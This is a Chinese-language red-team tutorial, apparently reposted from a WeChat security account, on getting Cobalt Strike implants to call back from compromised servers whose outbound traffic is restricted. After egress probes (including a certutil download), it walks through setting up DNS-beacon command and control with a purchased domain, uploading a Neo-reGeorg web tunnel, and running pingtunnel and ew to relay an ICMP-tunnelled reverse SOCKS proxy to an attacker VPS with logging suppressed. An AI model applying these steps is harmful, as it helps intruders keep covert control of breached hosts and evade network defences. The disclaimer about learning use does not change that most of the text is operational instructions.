红队技巧-跳板机不出网利用

拿到shell的时，上传cs马子后发现执行无法上线，如果马子没被杀，那么可能是服务器不出网的情况。那么现在我们需要判断哪些协议出网，先介绍判断三种协议是否出网的方法。

免责声明：本文仅用于学习和技术研究，读者利用本文所提供的信息造成的任何直接或间接的影响和损失均由该读者负责，文章作者以及公众号不为此承担任何责任，请遵守国家网络安全法，维护良好的网络环境。

情况一：dns协议

windows

nslookup baidu.com

linux

nslookup baidu.com

dig @8.8.8.8 www.baidu.com

情况二：http/https协议

windows

curl http（s）://www.baidu.com

certutil -urlcache -split -f https://www.baidu.com/robots.txt 

linux

curl http://www.baidu.com

wget http://www.baidu.com/robots.txt

情况三：icmp协议

windows

ping baidu.com

tracert baidu.com

linux

ping -c 4 baidu.com

判断完之后就可以尝试利用出网的协议上线或者搭代理，下面介绍不同协议出网下的利用方式

一、dns协议出网（延迟较高）

1、porkbun买个域名

https://porkbun.com

2、cloudflare配置dns records

https://dash.cloudflare.com

如图中标识进行配置，但是注意，所有ns的content都是cs.根域名。

3、复制cloudflare的下面的nameservers

粘贴填入到porkbun的nameservers里面，原本默认的内容直接删除

4、等待七八分钟，然后ping cs.域名，ping的通就可以继续了

如果不能ping通，那么关闭->保存->开启->保存

5、systemctl stop systemd-resolved，解除linux的53端口占用

6、注意：先解除端口占用再cs配置监听哈

dnshosts内容是 ns1.根域名   ns2.根域名

dns host (stager)是ns1.根域名

注意：不是ns1.cs.根域名，是直接ns1.根域名哈

7、生成木马上线，上线就是黑框，输入checkin

8、稍等之后，输入mode dns-txt

唯一雷点：推荐使用Ubuntu和腾讯云，亲测火山云无法上线

二、http/https协议出网

neo-regeorg

1、上传tunnel.ashx

2、访问解析成功

3、neoreg.py -k 123 -u http://xxxx:85/tunnel.ashx

4、pro  设置本地代理 127.0.0.1   1080端口即可

5、设置规则

三、icmp协议出网

1、上线gesila

2、ping baidu发现icmp协议出网

3、vps开启pingtunnel

./pingtunnel -type server -noprint 1 -nolog 1

4、跳板机上传pingtunnel.exe

执行

pingtunnel.exe -type client -l 127.0.0.1:9999 -s vps -t vps:7777 -tcp 1 -noprint 1 -nolog 1

推荐 -noprint 1 -nolog 1 避免一直输出日志

成功建立连接

5、cs生成监听，一个本地回环一个监听外网

建立监听127.0.0.1:9999和vps:7777

6、使用本地回环的监听生成木马

7、上传执行上线

pingtunnel联动ew搭建代理

1、vps执行 ./ew_for_linux64 -s rcsocks -l 10080 -e 8898

2、vps执行 ./pingtunnel -type server

3、web服务器执行

pingtunnel.exe -type client -l 127.0.0.1:9999 -s vps  -t vps:8898 -sock5 -1 -noprint 1 -nolog 1

4、vps连接

5、建立成功

6、pro配置搭建成功

下一篇-cs流量隐匿-域前置配置

原文始发于微信公众号（朱厌安全）：红队技巧-跳板机不出网利用